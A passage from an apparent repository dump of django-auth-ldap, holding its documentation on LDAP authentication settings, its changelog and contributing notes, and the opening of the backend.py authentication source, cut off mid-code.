send_sms(self, username):\n # Implement your SMS logic here\n print(\"SMS sent!\")\n\n\n\n.. code-block:: python\n\n # settings.py\n\n AUTHENTICATION_BACKENDS = [\n # ...\n \"mypackage.ldap.CustomLDAPBackend\",\n # ...\n ]\n\n\nUsing default_settings\n----------------------\n\nWhile you can use your own custom Django settings to create something similar \nto the sample code above, there are a couple of advantages in using \n:attr:`~django_auth_ldap.backend.LDAPBackend.default_settings` instead. \n\nFollowing the sample code above, one advantage is that the subclass will now \nautomatically check your Django settings for ``AUTH_LDAP_LOGIN_COUNTER_KEY``, \n``AUTH_LDAP_LOGIN_ATTEMPT_LIMIT``, ``AUTH_LDAP_RESET_TIME``, and \n``AUTH_LDAP_USERNAME_REGEX``. Another advantage is that for each setting not \nexplicitly defined in your Django settings, the subclass will then use the \ncorresponding default values. This behavior will be very handy in case you \nwill need to override certain settings. \n\n\nOverriding default_settings\n---------------------------\n\nIf down the line, you want to increase the login attempt limit to 100 every \n15 minutes, and you only want SMS notifications for usernames with a \"zz\\_\" \nprefix, then you can simply modify your settings.py like so.\n\n.. code-block:: python\n\n # settings.py\n\n AUTH_LDAP_LOGIN_ATTEMPT_LIMIT = 100\n AUTH_LDAP_RESET_TIME = 15 * 60\n AUTH_LDAP_USERNAME_REGEX = r\"^zz_.*$\"\n\n AUTHENTICATION_BACKENDS = [\n # ...\n \"mypackage.ldap.CustomLDAPBackend\",\n # ...\n ]\n\nIf the :attr:`~django_auth_ldap.backend.LDAPBackend.settings_prefix` of the\nsubclass was also changed, then the prefix must also be used in your settings. \nFor example, if the prefix was changed to \"AUTH_LDAP_1\\_\", then it should look \nlike this.\n\n.. 
code-block:: python\n\n # settings.py\n\n AUTH_LDAP_1_LOGIN_ATTEMPT_LIMIT = 100\n AUTH_LDAP_1_RESET_TIME = 15 * 60\n AUTH_LDAP_1_USERNAME_REGEX = r\"^zz_.*$\"\n\n AUTHENTICATION_BACKENDS = [\n # ...\n \"mypackage.ldap.CustomLDAPBackend\",\n # ...\n ]\n" }, { "alpha_fraction": 0.7587857246398926, "alphanum_fraction": 0.7598796486854553, "avg_line_length": 39.403316497802734, "blob_id": "ffcab043e90be3a12304c75b82742cdf1e8c9b0f", "content_id": "c5c4e57cefa8042d4797d45d14c11960d716ae2a", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 7313, "license_type": "permissive", "max_line_length": 92, "num_lines": 181, "path": "/docs/authentication.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Authentication\n==============\n\nServer Config\n-------------\n\nIf your LDAP server isn't running locally on the default port, you'll want to\nstart by setting :setting:`AUTH_LDAP_SERVER_URI` to point to your server. The\nvalue of this setting can be anything that your LDAP library supports. For\ninstance, openldap may allow you to give a comma- or space-separated list of\nURIs to try in sequence.\n\n.. code-block:: python\n\n AUTH_LDAP_SERVER_URI = \"ldap://ldap.example.com\"\n\nIf your server location is even more dynamic than this, you may provide a\nfunction (or any callable object) that returns the URI. The callable is passed\na single positional argument: ``request``. You should assume that this will be\ncalled on every request, so if it's an expensive operation, some caching is in\norder.\n\n.. code-block:: python\n\n from my_module import find_my_ldap_server\n\n AUTH_LDAP_SERVER_URI = find_my_ldap_server\n\nIf you need to configure any python-ldap options, you can set\n:setting:`AUTH_LDAP_GLOBAL_OPTIONS` and/or\n:setting:`AUTH_LDAP_CONNECTION_OPTIONS`. For example, disabling referrals is not\nuncommon:\n\n.. code-block:: python\n\n import ldap\n\n AUTH_LDAP_CONNECTION_OPTIONS = {ldap.OPT_REFERRALS: 0}\n\n.. versionchanged:: 1.7.0\n\n When ``AUTH_LDAP_SERVER_URI`` is set to a callable, it is now passed a\n positional ``request`` argument. Support for no arguments will continue for\n backwards compatibility but will be removed in a future version.\n\n\nSearch/Bind\n-----------\n\nNow that you can talk to your LDAP server, the next step is to authenticate a\nusername and password. There are two ways to do this, called search/bind and\ndirect bind. The first one involves connecting to the LDAP server either\nanonymously or with a fixed account and searching for the distinguished name of\nthe authenticating user. Then we can attempt to bind again with the user's\npassword. The second method is to derive the user's DN from his username and\nattempt to bind as the user directly.\n\nBecause LDAP searches appear elsewhere in the configuration, the\n:class:`~django_auth_ldap.config.LDAPSearch` class is provided to encapsulate\nsearch information. In this case, the filter parameter should contain the\nplaceholder ``%(user)s``. A simple configuration for the search/bind approach\nlooks like this (some defaults included for completeness):\n\n.. 
code-block:: python\n\n import ldap\n from django_auth_ldap.config import LDAPSearch\n\n AUTH_LDAP_BIND_DN = \"\"\n AUTH_LDAP_BIND_PASSWORD = \"\"\n AUTH_LDAP_USER_SEARCH = LDAPSearch(\n \"ou=users,dc=example,dc=com\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n )\n\nThis will perform an anonymous bind, search under\n``\"ou=users,dc=example,dc=com\"`` for an object with a uid matching the user's\nname, and try to bind using that DN and the user's password. The search must\nreturn exactly one result or authentication will fail. If you can't search\nanonymously, you can set :setting:`AUTH_LDAP_BIND_DN` to the distinguished name\nof an authorized user and :setting:`AUTH_LDAP_BIND_PASSWORD` to the password.\n\nSearch Unions\n^^^^^^^^^^^^^\n\n.. versionadded:: 1.1\n\nIf you need to search in more than one place for a user, you can use\n:class:`~django_auth_ldap.config.LDAPSearchUnion`. This takes multiple\nLDAPSearch objects and returns the union of the results. The precedence of the\nunderlying searches is unspecified.\n\n.. code-block:: python\n\n import ldap\n from django_auth_ldap.config import LDAPSearch, LDAPSearchUnion\n\n AUTH_LDAP_USER_SEARCH = LDAPSearchUnion(\n LDAPSearch(\"ou=users,dc=example,dc=com\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"),\n LDAPSearch(\"ou=otherusers,dc=example,dc=com\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"),\n )\n\n\nDirect Bind\n-----------\n\nTo skip the search phase, set :setting:`AUTH_LDAP_USER_DN_TEMPLATE` to a\ntemplate that will produce the authenticating user's DN directly. This template\nshould have one placeholder, ``%(user)s``. If the first example had used\n``ldap.SCOPE_ONELEVEL``, the following would be a more straightforward (and\nefficient) equivalent:\n\n.. code-block:: python\n\n AUTH_LDAP_USER_DN_TEMPLATE = \"uid=%(user)s,ou=users,dc=example,dc=com\"\n\n\n.. _customizing-authentication:\n\nCustomizing Authentication\n--------------------------\n\n.. versionadded:: 1.3\n\nIt is possible to further customize the authentication process by subclassing\n:class:`~django_auth_ldap.backend.LDAPBackend` and overriding\n:meth:`~django_auth_ldap.backend.LDAPBackend.authenticate_ldap_user`. The first\nargument is the unauthenticated :ref:`ldap_user <ldap_user>`, the second is the\nsupplied password. The intent is to give subclasses a simple pre- and\npost-authentication hook.\n\nIf a subclass decides to proceed with the authentication, it must call the\ninherited implementation. It may then return either the authenticated user or\n``None``. The behavior of any other return value--such as substituting a\ndifferent user object--is undefined. :doc:`users` has more on managing Django\nuser objects.\n\nObviously, it is always safe to access ``ldap_user.dn`` before authenticating\nthe user. Accessing ``ldap_user.attrs`` and others should be safe unless you're\nrelying on special binding behavior, such as\n:setting:`AUTH_LDAP_BIND_AS_AUTHENTICATING_USER`.\n\nNotes\n-----\n\nLDAP is fairly flexible when it comes to matching DNs.\n:class:`~django_auth_ldap.backend.LDAPBackend` makes an effort to accommodate\nthis by forcing usernames to lower case when creating Django users and trimming\nwhitespace when authenticating.\n\nSome LDAP servers are configured to allow users to bind without a password. As a\nprecaution against false positives,\n:class:`~django_auth_ldap.backend.LDAPBackend` will summarily reject any\nauthentication attempt with an empty password. 
You can disable this behavior by\nsetting :setting:`AUTH_LDAP_PERMIT_EMPTY_PASSWORD` to True.\n\nBy default, all LDAP operations are performed with the\n:setting:`AUTH_LDAP_BIND_DN` and :setting:`AUTH_LDAP_BIND_PASSWORD` credentials,\nnot with the user's. Otherwise, the LDAP connection would be bound as the\nauthenticating user during login requests and as the default credentials during\nother requests, so you might see inconsistent LDAP attributes depending on the\nnature of the Django view. If you're willing to accept the inconsistency in\norder to retrieve attributes while bound as the authenticating user, see\n:setting:`AUTH_LDAP_BIND_AS_AUTHENTICATING_USER`.\n\nBy default, LDAP connections are unencrypted and make no attempt to protect\nsensitive information, such as passwords. When communicating with an LDAP server\non localhost or on a local network, this might be fine. If you need a secure\nconnection to the LDAP server, you can either use an ``ldaps://`` URL or enable\nthe StartTLS extension. The latter is generally the preferred mechanism. To\nenable StartTLS, set :setting:`AUTH_LDAP_START_TLS` to ``True``:\n\n.. code-block:: python\n\n AUTH_LDAP_START_TLS = True\n\nIf :class:`~django_auth_ldap.backend.LDAPBackend` receives an\n:exc:`~ldap.LDAPError` from python_ldap, it will normally swallow it and log a\nwarning. If you'd like to perform any special handling for these exceptions, you\ncan add a signal handler to :data:`django_auth_ldap.backend.ldap_error`. The\nsignal handler can handle the exception any way you like, including re-raising\nit or any other exception.\n" }, { "alpha_fraction": 0.6214092969894409, "alphanum_fraction": 0.6746394634246826, "avg_line_length": 25.653125762939453, "blob_id": "fbc488621700b189526a1e6b321b6ae65ec6837d", "content_id": "4dedf46b100d7dc2280376862167f592bae301a6", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 8531, "license_type": "permissive", "max_line_length": 95, "num_lines": 320, "path": "/docs/changes.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Change Log\n==========\n\n.. important:: The releases are now tracked using the `GitHub releases\n <https://github.com/django-auth-ldap/django-auth-ldap/releases>`_. The\n following remains for historical purposes.\n\nOld changes\n-----------\n\nBreaking changes\n^^^^^^^^^^^^^^^^\n\n- The signal ``ldap_error`` now has an additional ``request`` keyword argument.\n\n- Added support for Python 3.10.\n- Added support for Django 4.0.\n\n3.0.0 — 2021-07-19\n------------------\n\n- Dropped support for Django 3.0.\n\nBreaking changes\n^^^^^^^^^^^^^^^^\n\n- Dropped deprecated setting ``AUTH_LDAP_CACHE_GROUPS``.\n- Callables passed to ``AUTH_LDAP_SERVER_URI`` must now take a ``request`` positional argument.\n\n2.4.0 - 2021-04-06\n------------------\n\n- Added support for Django 3.2.\n\n2.3.0 - 2021-02-15\n------------------\n\n- Removed support for end of life Django 1.11. 
django-auth-ldap now requires\n Django 2.2+.\n- Removed support for end of life Python 3.5.\n- Added support for Django 3.1.\n- Added support for Python 3.9.\n- Removed ``dev-requirements.txt`` in favor of :doc:`tox <tox:index>`.\n\n2.2.0 - 2020-06-02\n------------------\n\n- Added support for the escape argument in ``LDAPSearchUnion.execute()``.\n\n2.1.1 - 2020-03-26\n------------------\n\n- Removed deprecated ``providing_args`` from ``Signal`` instances.\n\n2.1.0 - 2019-12-03\n------------------\n\n- Reject authentication requests without a username.\n- Added support for Django 3.0 and Python 3.8.\n- Removed support for end of life Django 2.1.\n\n2.0.0 - 2019-06-05\n------------------\n\n- Removed support for Python 2 and 3.4.\n- Removed support for end of life Django 2.0.\n- Added support for Django 2.2.\n- Add testing and support for Python 3.7 with Django 1.11 and 2.1.\n- When :setting:`AUTH_LDAP_SERVER_URI` is set to a callable, it is now passed a\n positional ``request`` argument. Support for no arguments will continue for\n backwards compatibility but will be removed in a future version.\n- Added new :setting:`AUTH_LDAP_NO_NEW_USERS` to prevent the creation of new\n users during authentication. Any users not already in the Django user\n database will not be able to login.\n\n1.6.1 - 2018-06-02\n------------------\n\n- Renamed ``requirements.txt`` to ``dev-requirements.txt`` to fix Read the Docs\n build.\n\n1.6.0 - 2018-06-02\n------------------\n\n- Updated ``LDAPBackend.authenticate()`` signature to match Django's\n documentation.\n- Fixed group membership queries with DNs containing non-ascii characters on\n Python 2.7.\n- The setting :setting:`AUTH_LDAP_CACHE_TIMEOUT` now replaces deprecated\n `AUTH_LDAP_CACHE_GROUPS` and `AUTH_LDAP_GROUP_CACHE_TIMEOUT`. In addition to\n caching groups, it also controls caching of distinguished names (which were\n previously cached by default). A compatibility shim is provided so the\n deprecated settings will continue to work.\n\n1.5.0 - 2018-04-18\n------------------\n\n- django-auth-ldap is now hosted at\n https://github.com/django-auth-ldap/django-auth-ldap.\n\n- Removed NISGroupType class. It searched by attribute nisNetgroupTriple, which\n has no defined EQUALITY rule.\n\n- The python-ldap library is now initialized with ``bytes_mode=False``,\n requiring all LDAP values to be handled as Unicode text (``str`` in Python 3\n and ``unicode`` in Python 2), not bytes. For additional information, see the\n python-ldap documentation on :ref:`bytes mode <text-bytes>`.\n\n- Removed deprecated function ``LDAPBackend.get_or_create_user()``. Use\n :meth:`~django_auth_ldap.backend.LDAPBackend.get_or_build_user` instead.\n\n\n1.4.0 - 2018-03-22\n------------------\n\n- Honor the attrlist argument to :setting:`AUTH_LDAP_GROUP_SEARCH`\n\n- **Backwards incompatible**: Removed support for Django < 1.11.\n\n- Support for Python 2.7 and 3.4+ now handled by the same dependency,\n `python-ldap >= 3.0 <https://pypi.org/project/python-ldap/>`_.\n\n\n1.3.0 - 2017-11-20\n------------------\n\n- **Backwards incompatible**: Removed support for obsolete versions of\n Django (<=1.7, plus 1.9).\n\n- Delay saving new users as long as possible. This will allow\n :setting:`AUTH_LDAP_USER_ATTR_MAP` to populate required fields before creating\n a new Django user.\n\n ``LDAPBackend.get_or_create_user()`` is now\n :meth:`~django_auth_ldap.backend.LDAPBackend.get_or_build_user` to avoid\n confusion. 
The old name may still be overridden for now.\n\n- Support querying by a field other than the username field with\n :setting:`AUTH_LDAP_USER_QUERY_FIELD`.\n\n- New method\n :meth:`~django_auth_ldap.backend.LDAPBackend.authenticate_ldap_user` to\n provide pre- and post-authentication hooks.\n\n- Add support for Django 2.0.\n\n\n1.2.16 - 2017-09-30\n-------------------\n\n- Better cache key sanitizing.\n\n- Improved handling of LDAPError. A case existed where the error would not get\n caught while loading group permissions.\n\n\n1.2.15 - 2017-08-17\n-------------------\n\n- Improved documentation for finding the official repository and contributing.\n\n\n1.2.14 - 2017-07-24\n-------------------\n\n- Under search/bind mode, the user's DN will now be cached for\n performance.\n\n\n1.2.13 - 2017-06-19\n-------------------\n\n- Support selective group mirroring with :setting:`AUTH_LDAP_MIRROR_GROUPS` and\n :setting:`AUTH_LDAP_MIRROR_GROUPS_EXCEPT`.\n\n- Work around Django 1.11 bug with multiple authentication backends.\n\n\n1.2.12 - 2017-05-20\n-------------------\n\n- Support for complex group queries via\n :class:`~django_auth_ldap.config.LDAPGroupQuery`.\n\n\n1.2.11 - 2017-04-22\n-------------------\n\n- Some more descriptive object representations.\n\n- Improved tox.ini organization.\n\n\n1.2.9 - 2017-02-14\n------------------\n\n- Ignore python-ldap documentation and accept ``ldap.RES_SEARCH_ENTRY`` from\n :meth:`ldap.LDAPObject.result`.\n\n\n1.2.8 - 2016-04-18\n------------------\n\n- Add :setting:`AUTH_LDAP_USER_ATTRLIST` to override the set of attributes\n requested from the LDAP server.\n\n\n1.2.7 - 2015-09-29\n------------------\n\n- Support Python 3 with `pyldap <https://pypi.org/project/pyldap/>`_.\n\n\n1.2.6 - 2015-03-29\n------------------\n\n- Performance improvements to group mirroring (from\n `Denver Janke <https://bitbucket.org/denverjanke>`_).\n\n- Add :data:`django_auth_ldap.backend.ldap_error` signal for custom handling of\n :exc:`~ldap.LDAPError` exceptions.\n\n- Add :data:`django_auth_ldap.backend.LDAPBackend.default_settings` for\n per-subclass default settings.\n\n\n1.2.5 - 2015-01-30\n------------------\n\n- Fix interaction between :setting:`AUTH_LDAP_AUTHORIZE_ALL_USERS` and\n :setting:`AUTH_LDAP_USER_SEARCH`.\n\n\n1.2.4 - 2014-12-28\n------------------\n\n- Add support for nisNetgroup groups (thanks to Christopher Bartz).\n\n\n1.2.3 - 2014-11-18\n------------------\n\n- Improved escaping for filter strings.\n\n- Accept (and ignore) arbitrary keyword arguments to\n ``LDAPBackend.authenticate``.\n\n\n1.2.2 - 2014-09-22\n------------------\n\n- Include test harness in source distribution. Some package maintainers find\n this helpful.\n\n\n1.2.1 - 2014-08-24\n------------------\n\n- More verbose log messages for authentication failures.\n\n\n1.2.0 - 2014-04-10\n------------------\n\n- django-auth-ldap now provides experimental Python 3 support. Python 2.5 was\n dropped.\n\n To sum up, django-auth-ldap works with Python 2.6, 2.7, 3.3 and 3.4.\n\n Since python-ldap isn't making progress toward Python 3, if you're using\n Python 3, you need to install a fork:\n\n .. 
code-block:: bash\n\n $ pip install git+https://github.com/rbarrois/python-ldap.git@py3\n\n Thanks to `Aymeric Augustin <https://myks.org/en/>`_ for making this happen.\n\n\n1.1.8 - 2014-02-01\n------------------\n\n* Update :class:`~django_auth_ldap.config.LDAPSearchUnion` to work for group\n searches in addition to user searches.\n\n* Tox no longer supports Python 2.5, so our tests now run on 2.6 and 2.7 only.\n\n\n1.1.7 - 2013-11-19\n------------------\n\n* Bug fix: :setting:`AUTH_LDAP_GLOBAL_OPTIONS` could be ignored in some cases\n (such as :func:`~django_auth_ldap.backend.LDAPBackend.populate_user`).\n\n\n1.1.5 - 2013-10-25\n------------------\n\n* Support POSIX group permissions with no gidNumber attribute.\n\n* Support multiple group DNs for \\*_FLAGS_BY_GROUP.\n\n\n1.1.4 - 2013-03-09\n------------------\n\n* Add support for Django 1.5's custom user models.\n\n\n1.1.3 - 2013-01-05\n------------------\n\n* Reject empty passwords by default.\n\n Unless :setting:`AUTH_LDAP_PERMIT_EMPTY_PASSWORD` is set to True,\n LDAPBackend.authenticate() will immediately return None if the password is\n empty. This is technically backwards-incompatible, but it's a more secure\n default for those LDAP servers that are configured such that binds without\n passwords always succeed.\n\n* Add support for pickling LDAP-authenticated users.\n" }, { "alpha_fraction": 0.7337461113929749, "alphanum_fraction": 0.7337461113929749, "avg_line_length": 26.685714721679688, "blob_id": "753b60af2e2c6b4fc439c3a8c3d364cb66ee31dc", "content_id": "724acde43a2c432e4e38cf3103f0a078eaed61ed", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 969, "license_type": "permissive", "max_line_length": 83, "num_lines": 35, "path": "/docs/contributing.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Contributing\n============\n\nIf you'd like to contribute, the best approach is to send a well-formed pull\nrequest, complete with tests and documentation. Pull requests should be\nfocused: trying to do more than one thing in a single request will make it more\ndifficult to process.\n\nIf you have a bug or feature request you can try `logging an issue`_.\n\nThere's no harm in creating an issue and then submitting a pull request to\nresolve it. This can be a good way to start a conversation and can serve as an\nanchor point.\n\n.. _`logging an issue`: https://github.com/django-auth-ldap/django-auth-ldap/issues\n\n\nDevelopment\n-----------\n\nTo run the full test suite in a range of environments, run :doc:`tox <tox:index>`\nfrom the root of the project:\n\n.. code-block:: sh\n\n $ tox\n\nThis includes some static analysis to detect potential runtime errors and style\nissues.\n\nTo limit to a single environment, use :ref:`tox-run--e`:\n\n.. 
code-block:: console\n\n $ tox -e djangomain\n" }, { "alpha_fraction": 0.588276743888855, "alphanum_fraction": 0.5890117287635803, "avg_line_length": 31.98282814025879, "blob_id": "c064db27f7a5619dc1d587b2fd9dddd797355a4f", "content_id": "fc37ef23d7806238781ad90e7320c2f67d27a37f", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32653, "license_type": "permissive", "max_line_length": 88, "num_lines": 990, "path": "/django_auth_ldap/backend.py", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "# Copyright (c) 2009, Peter Sagerson\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# - Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# - Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"\nLDAP authentication backend\n\nDocumentation: https://django-auth-ldap.readthedocs.io/\n\nA few notes on naming conventions. If an identifier ends in _dn, it is a string\nrepresentation of a distinguished name. If it ends in _info, it is a 2-tuple\ncontaining a DN and a dictionary of lists of attributes. ldap.search_s returns a\nlist of such structures. An identifier that ends in _attrs is the dictionary of\nattributes from the _info structure.\n\nA connection is an LDAPObject that has been successfully bound with a DN and\npassword. The identifier 'user' always refers to a User model object; LDAP user\ninformation will be user_dn or user_info.\n\nAdditional classes can be found in the config module next to this one.\n\"\"\"\n\nimport copy\nimport operator\nimport pprint\nimport re\nimport warnings\nfrom functools import reduce\n\nimport django.conf\nimport django.dispatch\nimport ldap\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import Group, Permission\nfrom django.core.cache import cache\nfrom django.core.exceptions import ImproperlyConfigured, ObjectDoesNotExist\n\nfrom .config import (\n ConfigurationWarning,\n LDAPGroupQuery,\n LDAPSearch,\n LDAPSettings,\n _LDAPConfig,\n)\n\nlogger = _LDAPConfig.get_logger()\n\n\n# Exported signals\n\n# Allows clients to perform custom user population.\n# Passed arguments: user, ldap_user\npopulate_user = django.dispatch.Signal()\n\n# Allows clients to inspect and perform special handling of LDAPError\n# exceptions. 
Exceptions raised by handlers will be propagated out.\n# Passed arguments: context, user, exception\nldap_error = django.dispatch.Signal()\n\n\nclass LDAPBackend:\n \"\"\"\n The main backend class. This implements the auth backend API, although it\n actually delegates most of its work to _LDAPUser, which is defined next.\n \"\"\"\n\n supports_anonymous_user = False\n supports_object_permissions = True\n supports_inactive_user = False\n\n _settings = None\n _ldap = None # The cached ldap module (or mock object)\n\n # This is prepended to our internal setting names to produce the names we\n # expect in Django's settings file. Subclasses can change this in order to\n # support multiple collections of settings.\n settings_prefix = \"AUTH_LDAP_\"\n\n # Default settings to override the built-in defaults.\n default_settings = {}\n\n def __getstate__(self):\n \"\"\"\n Exclude certain cached properties from pickling.\n \"\"\"\n return {\n k: v for k, v in self.__dict__.items() if k not in [\"_settings\", \"_ldap\"]\n }\n\n @property\n def settings(self):\n if self._settings is None:\n self._settings = LDAPSettings(self.settings_prefix, self.default_settings)\n\n return self._settings\n\n @settings.setter\n def settings(self, settings):\n self._settings = settings\n\n @property\n def ldap(self):\n if self._ldap is None:\n options = getattr(django.conf.settings, \"AUTH_LDAP_GLOBAL_OPTIONS\", None)\n\n self._ldap = _LDAPConfig.get_ldap(options)\n\n return self._ldap\n\n def get_user_model(self):\n \"\"\"\n By default, this will return the model class configured by\n AUTH_USER_MODEL. Subclasses may wish to override it and return a proxy\n model.\n \"\"\"\n return get_user_model()\n\n #\n # The Django auth backend API\n #\n\n def authenticate(self, request, username=None, password=None, **kwargs):\n if username is None:\n return None\n\n if password or self.settings.PERMIT_EMPTY_PASSWORD:\n ldap_user = _LDAPUser(self, username=username.strip(), request=request)\n user = self.authenticate_ldap_user(ldap_user, password)\n else:\n logger.debug(\"Rejecting empty password for %s\", username)\n user = None\n\n return user\n\n def get_user(self, user_id):\n user = None\n\n try:\n user = self.get_user_model().objects.get(pk=user_id)\n _LDAPUser(self, user=user) # This sets user.ldap_user\n except ObjectDoesNotExist:\n pass\n\n return user\n\n def has_perm(self, user, perm, obj=None):\n return perm in self.get_all_permissions(user, obj)\n\n def has_module_perms(self, user, app_label):\n for perm in self.get_all_permissions(user):\n if perm[: perm.index(\".\")] == app_label:\n return True\n\n return False\n\n def get_all_permissions(self, user, obj=None):\n return self.get_group_permissions(user, obj)\n\n def get_group_permissions(self, user, obj=None):\n if not hasattr(user, \"ldap_user\") and self.settings.AUTHORIZE_ALL_USERS:\n _LDAPUser(self, user=user) # This sets user.ldap_user\n\n if hasattr(user, \"ldap_user\"):\n permissions = user.ldap_user.get_group_permissions()\n else:\n permissions = set()\n\n return permissions\n\n #\n # Bonus API: populate the Django user from LDAP without authenticating.\n #\n\n def populate_user(self, username):\n ldap_user = _LDAPUser(self, username=username)\n return ldap_user.populate_user()\n\n #\n # Hooks for subclasses\n #\n\n def authenticate_ldap_user(self, ldap_user, password):\n \"\"\"\n Returns an authenticated Django user or None.\n \"\"\"\n return ldap_user.authenticate(password)\n\n def get_or_build_user(self, username, ldap_user):\n \"\"\"\n This must return a 
(User, built) 2-tuple for the given LDAP user.\n\n username is the Django-friendly username of the user. ldap_user.dn is\n the user's DN and ldap_user.attrs contains all of their LDAP\n attributes.\n\n The returned User object may be an unsaved model instance.\n\n \"\"\"\n model = self.get_user_model()\n\n if self.settings.USER_QUERY_FIELD:\n query_field = self.settings.USER_QUERY_FIELD\n query_value = ldap_user.attrs[self.settings.USER_ATTR_MAP[query_field]][0]\n lookup = query_field\n else:\n query_field = model.USERNAME_FIELD\n query_value = username.lower()\n lookup = \"{}__iexact\".format(query_field)\n\n try:\n user = model.objects.get(**{lookup: query_value})\n except model.DoesNotExist:\n user = model(**{query_field: query_value})\n built = True\n else:\n built = False\n\n return (user, built)\n\n def ldap_to_django_username(self, username):\n return username\n\n def django_to_ldap_username(self, username):\n return username\n\n\nclass _LDAPUser:\n \"\"\"\n Represents an LDAP user and ultimately fields all requests that the\n backend receives. This class exists for two reasons. First, it's\n convenient to have a separate object for each request so that we can use\n object attributes without running into threading problems. Second, these\n objects get attached to the User objects, which allows us to cache\n expensive LDAP information, especially around groups and permissions.\n\n self.backend is a reference back to the LDAPBackend instance, which we need\n to access the ldap module and any hooks that a subclass has overridden.\n \"\"\"\n\n class AuthenticationFailed(Exception):\n pass\n\n # Defaults\n _user = None\n _user_dn = None\n _user_attrs = None\n _groups = None\n _group_permissions = None\n _connection = None\n _connection_bound = False\n\n #\n # Initialization\n #\n\n def __init__(self, backend, username=None, user=None, request=None):\n \"\"\"\n A new LDAPUser must be initialized with either a username or an\n authenticated User object. If a user is given, the username will be\n ignored.\n \"\"\"\n self.backend = backend\n self._username = username\n self._request = request\n\n if user is not None:\n self._set_authenticated_user(user)\n\n if username is None and user is None:\n raise Exception(\"Internal error: _LDAPUser improperly initialized.\")\n\n def __deepcopy__(self, memo):\n obj = object.__new__(type(self))\n obj.backend = self.backend\n obj._user = copy.deepcopy(self._user, memo)\n\n # This is all just cached immutable data. There's no point copying it.\n obj._username = self._username\n obj._user_dn = self._user_dn\n obj._user_attrs = self._user_attrs\n obj._groups = self._groups\n obj._group_permissions = self._group_permissions\n\n # The connection couldn't be copied even if we wanted to\n obj._connection = self._connection\n obj._connection_bound = self._connection_bound\n\n return obj\n\n def __getstate__(self):\n \"\"\"\n Most of our properties are cached from the LDAP server. 
We only want to\n pickle a few crucial things.\n \"\"\"\n return {\n k: v\n for k, v in self.__dict__.items()\n if k in [\"backend\", \"_username\", \"_user\"]\n }\n\n def _set_authenticated_user(self, user):\n self._user = user\n self._username = self.backend.django_to_ldap_username(user.get_username())\n\n user.ldap_user = self\n user.ldap_username = self._username\n\n @property\n def ldap(self):\n return self.backend.ldap\n\n @property\n def settings(self):\n return self.backend.settings\n\n #\n # Entry points\n #\n\n def authenticate(self, password):\n \"\"\"\n Authenticates against the LDAP directory and returns the corresponding\n User object if successful. Returns None on failure.\n \"\"\"\n user = None\n\n try:\n self._authenticate_user_dn(password)\n self._check_requirements()\n self._get_or_create_user()\n\n user = self._user\n except self.AuthenticationFailed as e:\n logger.debug(\"Authentication failed for %s: %s\", self._username, e)\n except ldap.LDAPError as e:\n results = ldap_error.send(\n type(self.backend),\n context=\"authenticate\",\n user=self._user,\n request=self._request,\n exception=e,\n )\n if len(results) == 0:\n logger.warning(\n \"Caught LDAPError while authenticating %s: %s\",\n self._username,\n pprint.pformat(e),\n )\n except Exception as e:\n logger.warning(\"%s while authenticating %s\", e, self._username)\n raise\n\n return user\n\n def get_group_permissions(self):\n \"\"\"\n If allowed by the configuration, this returns the set of permissions\n defined by the user's LDAP group memberships.\n \"\"\"\n if self._group_permissions is None:\n self._group_permissions = set()\n\n if self.settings.FIND_GROUP_PERMS:\n try:\n if self.dn is not None:\n self._load_group_permissions()\n except ldap.LDAPError as e:\n results = ldap_error.send(\n type(self.backend),\n context=\"get_group_permissions\",\n user=self._user,\n request=self._request,\n exception=e,\n )\n if len(results) == 0:\n logger.warning(\n \"Caught LDAPError loading group permissions: %s\",\n pprint.pformat(e),\n )\n\n return self._group_permissions\n\n def populate_user(self):\n \"\"\"\n Populates the Django user object using the default bind credentials.\n \"\"\"\n user = None\n\n try:\n # self.attrs will only be non-None if we were able to load this user\n # from the LDAP directory, so this filters out nonexistent users.\n if self.attrs is not None:\n self._get_or_create_user(force_populate=True)\n\n user = self._user\n except ldap.LDAPError as e:\n results = ldap_error.send(\n type(self.backend),\n context=\"populate_user\",\n user=self._user,\n request=self._request,\n exception=e,\n )\n if len(results) == 0:\n logger.warning(\n \"Caught LDAPError while authenticating %s: %s\",\n self._username,\n pprint.pformat(e),\n )\n except Exception as 